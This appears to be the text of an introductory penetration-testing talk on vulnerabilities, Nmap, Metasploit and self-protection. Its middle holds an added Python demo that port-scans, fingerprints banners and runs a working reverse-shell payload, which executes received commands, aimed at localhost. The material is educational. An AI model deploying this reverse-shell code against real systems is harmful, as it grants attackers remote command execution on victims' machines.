Offensive Security Part 1 Basics of Penetration Testing Dennis (Linuz) Maldonado
About me
Dennis Maldonado, AKA Linuz
My Blog: http://kernelmeltdown.org/blog/
  Tutorials/Walkthroughs
  News and Events
  Recordings/Powerpoints
Twitter: https://twitter.com/dennismald
IRC: irc.freenode.net -- #CougarCS
Email: dennis@kernelmeltdown.org
Definitions
A vulnerability is a weakness in a computer system that an attacker can take advantage of.
A vulnerability assessment is the act of identifying vulnerabilities on a specific computer or network.
An exploit is the code (or technique) that lets the attacker take advantage of a vulnerability.
Definitions
A payload is the code or program that runs once an exploit has succeeded (for example, code that opens a shell back to the attacker).
A backdoor is a method of bypassing normal authentication so the attacker can get back into the system later.
A shell lets us interact with a system, typically through a command line.
Vulnerability Assessment
Scan the victim's IP address or hostname to find the ports and services that are running.
Identify whether any of those services are vulnerable (by version, configuration, or known weaknesses).
The assessment stops there; launching an exploit against a vulnerable service and delivering a payload is the exploitation step that follows.
Steps in a Penetration Test
Information Gathering
  Information on the server: any web server? Nmap
Vulnerability Identification
  Nmap version scans / OS scans
  Other scanning tools
Exploitation
  Bruteforcing
  Remote exploits
Post Exploitation
  Reverse shells
  Persistence
  Anti-forensics
  Etc.
Tools
BackTrack Linux 5 R2/R3 – our attacker machine
Nmap network scanner – used for identifying the ports and services our victim is running
Metasploit Framework – used for exploiting, generating the payload, and establishing a session with our victim
The Metasploit Project
Metasploit is an open-source framework used for:
  Security development and testing
  Information gathering and fingerprinting
  Exploitation / penetration testing
  Payload generation and encoding
  Fuzzing
  And much more
Steps in compromising
Port scan / version scan
Fingerprint the open ports and the services behind them
Exploit + payload
Reverse shell
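The chain on the "Vulnerability Assessment", "Steps in a Penetration Test" and "Steps in compromising" slides (port scan, version scan, fingerprint, exploit with a reverse-shell payload) is what Nmap and Metasploit automate. The following is an added example, not code from the slides or from either project: it shows the mechanics with plain Python sockets against a fake "victim" service that the script itself starts on localhost, so it runs offline. The SSH banner, the ephemeral ports and the `echo` command sent over the shell are constructed for the demo; the exploit step is stood in for by a thread that launches the payload locally, since no real vulnerability is involved.

```python
# Added example (not from the slides); banner, ports and the shell command are constructed assumptions.
import re
import socket
import subprocess
import threading

FAKE_BANNER = b"SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7\r\n"  # constructed, imitates a real SSH greeting
END_MARK = b"<<EOF>>\n"  # terminates one command's output on the reverse shell
FINGERPRINTS = [  # banner regex -> service; named group "sw" captures the version string
    (re.compile(rb"^SSH-[\d.]+-(?P<sw>\S+)"), "ssh"),
    (re.compile(rb"^HTTP/[\d.]+ \d{3}"), "http"),
]


def start_victim_service(banner: bytes) -> int:
    """Fake victim: listen on an ephemeral localhost port and greet every client with `banner`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            try:
                with conn:
                    conn.sendall(banner)
            except OSError:
                pass  # a bare port scan hangs up without reading; ignore

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 0.5) -> list:
    """Step 1, port scan (what nmap -sT does): a port is open if the TCP handshake completes."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host: str, port: int, timeout: float = 1.0) -> bytes:
    """Step 2, version scan (nmap -sV starts this way): read what the service volunteers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(1024)
        except socket.timeout:  # silent service: nothing to fingerprint without a probe
            return b""


def fingerprint(banner: bytes) -> tuple:
    """Map a banner to (service, version); ("unknown", "") if no pattern matches."""
    for pattern, service in FINGERPRINTS:
        if m := pattern.match(banner):
            return service, (m.groupdict().get("sw") or b"").decode(errors="replace")
    return "unknown", ""


def reverse_shell_payload(host: str, port: int) -> None:
    """Victim side: connect *out* to the attacker, then run every line received until 'exit'."""
    with socket.create_connection((host, port)) as s:
        for line in s.makefile("rb"):
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            res = subprocess.run(cmd, shell=True, capture_output=True)
            s.sendall(res.stdout + res.stderr + END_MARK)


def run_session(command: str) -> str:
    """Attacker side: listen, wait for the payload (started here by a thread, in reality by the exploit) to connect back, run one command."""
    lst = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)
    lst.settimeout(5)
    port = lst.getsockname()[1]
    threading.Thread(target=reverse_shell_payload, args=("127.0.0.1", port), daemon=True).start()
    conn, _ = lst.accept()
    with lst, conn:
        conn.sendall(command.encode() + b"\n")
        buf = b""
        while not buf.endswith(END_MARK):
            chunk = conn.recv(4096)
            if not chunk:
                break
            buf += chunk
        conn.sendall(b"exit\n")
    if buf.endswith(END_MARK):
        buf = buf[: -len(END_MARK)]
    return buf.decode(errors="replace").strip()


def demo() -> dict:
    """Run scan -> banner -> fingerprint -> reverse shell against the local fake victim."""
    port = start_victim_service(FAKE_BANNER)
    open_ports = connect_scan("127.0.0.1", [port])
    service, version = fingerprint(grab_banner("127.0.0.1", port))
    return {"open": open_ports, "service": service, "version": version,
            "shell": run_session("echo reverse-shell-ok")}


if __name__ == "__main__":
    print(demo())
```

Two things the slides gloss over show up here. First, a banner grab only works for services that talk first (SSH, FTP, SMTP); HTTP says nothing until it receives a request, which is why `nmap -sV` sends probes when a port stays silent. Second, the reverse shell is the victim connecting outward to the attacker's listener, not the attacker connecting in, which is exactly why it gets through firewalls that only block inbound traffic.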
Demo/Workshop ...
How to secure yourself
Set up a firewall: Windows Firewall, Comodo Personal Firewall
  A host firewall that only filters inbound connections does not stop a reverse shell, which connects outward from the victim; restrict outbound traffic too
Install and update your anti-virus: Microsoft Security Essentials, NOD32
Keep your system up to date: actually apply that Flash update
  The remote exploits shown here only work against unpatched services; patching removes the vulnerability itself
Be cautious: watch where you browse, and don't just download anything
Want to learn more?
Kernel Meltdown Blog
Learn how to use Linux
  Download BackTrack Linux
  Learn networking and the tools
  Use the command line interface
Online resources
  Metasploit Unleashed (Metasploit guide)
  Also check out some forums
  Security Tube
Security podcasts
  Security Now by Steve Gibson
  PaulDotCom Security Weekly
  Others
Come talk to me
Sources
BackTrack Linux: http://www.backtrack-linux.org/
The Metasploit Project: http://www.metasploit.com/
Nmap: http://nmap.org/
Metasploit Unleashed: http://www.offensive-security.com/metasploit-unleashed/Main_Page
Security Tube: http://www.securitytube.net/